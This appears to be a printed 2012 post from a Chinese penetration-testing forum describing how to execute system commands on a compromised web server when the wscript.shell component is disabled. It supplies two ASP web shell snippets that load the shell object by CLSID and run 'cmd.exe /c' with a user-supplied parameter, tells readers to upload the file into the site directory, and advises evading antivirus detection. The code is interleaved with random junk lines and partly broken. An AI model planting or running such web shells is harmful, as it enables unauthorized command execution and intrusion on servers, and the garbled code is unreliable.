中国网络渗透测试联盟
标题:
没有wscript.shell组件提权方法
[打印本页]
作者:
admin
时间:
2012-10-21 09:08
标题:
没有wscript.shell组件提权方法
可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
6 U b( {" v* D" @" v
一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
1 ^5 ^6 s% i, D! z
要想让运行命令可以试试这种方法,成功率为五五之数。
% l, E5 D. Q0 D/ f+ t
把下面代码复制:
5 u% l$ R0 W" \; g5 o5 O% _
<%
# k& s, v1 P0 z& t* s9 V6 z5 Y
end if
z d9 w. x: `5 m- I' d( s9 V
response.write(”")
6 j* T( v: N6 k( Q& m% F) H; v
On Error Resume
3 f I; C/ U4 O3 R) l& @
Next
& u5 `6 m* @% r* A- z8 }
response.write oScriptlhn.exec(”cmd.exe /c” &
) B1 A+ _8 \4 V F2 m$ P
request(”c”)).stdout.readall
3 a3 O. _% y$ S3 _! T) q- E& b
response.write(”")
0 F1 b: o* \9 v2 f$ k4 u' h. G
response.write(”")
: h9 s m5 J: I( t' M. g! T3 ]3 t1 P1 _
response.write(”
. k- k& N6 ^/ h& x
“)
* ?. ]6 f t# c4 d
response.write(”")
8 U: |* @0 ~. Q* z9 `1 r
%>
* h* b* \& x E/ z# ^: [ {% a: T( x
保存为一个asp文件,然后传到网站目录上去
& j' H; t6 p; m- c
运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
7 x! I$ N c+ {
我用此成功运行过cacls命令。
- M, u! j( {' \3 |
第二那就是运行时出错,可能限制某些代码执行
- j3 g% e. a$ Y- _1 |
无wscript.shell组件提权又一个方法
^# ?: w% K9 E) O1 F
<object runat=server id=oScriptlhn scope=page
6 f0 P0 D0 y0 O" i1 @
, w$ p- Y! D' s
classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
4 U, L4 P& S: y) K$ u: y
<%if err then%>
8 v' }+ T) a( v; {: H4 f
<object runat=server id=oScriptlhn scope=page
8 \1 x* d6 d/ z
& {2 L6 p. D: q
classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>
4 ~0 e9 m: p( M3 M; V& |: ^ T0 l9 W
<%
2 E3 Q0 w# p1 k' T
end if
6 ]! G: W/ L1 \: w
response.write(”<textarea readonly cols=80
) A4 _( N+ z6 k
1 S9 f; A9 A+ ^; D8 q! [2 B3 l
rows=20>”)
* _& o" a; T) E* ^/ W; J( V- d
On Error Resume Next
- k% {1 U3 E$ N4 [7 Q3 C8 _) I
response.write
+ K$ q6 y6 D. [) V
0 q+ P8 O o! o
oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall
8 X* |/ W9 u3 I( g+ u, W- y' i* c* s
response.write(”</textarea>”)
. ]% o! m$ v6 w- w+ R
response.write(”<form
; P p0 x, Z% G$ T, S
. F4 { |$ Y2 p2 M9 n7 D6 s' V, o
method=’post’>”)
# b$ Y: H8 S5 \0 M% |1 D
response.write(”<input type=text name=’c'
, Y1 c5 P: D$ n- k0 A
d% _7 G3 S- r' j6 u- m8 \
size=60><br>”)
, O$ F6 h0 |( f' e# v# o# h( s
response.write(”<input type=submit
' R! f g3 T7 \6 b9 H
5 g7 C2 d2 ~$ w* n- B# f1 Q4 E
value=’执行’></form>”)
' \5 Y) v' z; K8 n6 Z& F
%>
5 v& B" `" d( F3 h' D
保存为ASP,此代码可能被杀,请注意免杀。
' ]) h$ L; s! D/ P
原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
% W; F2 v, u' c
复制代码
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2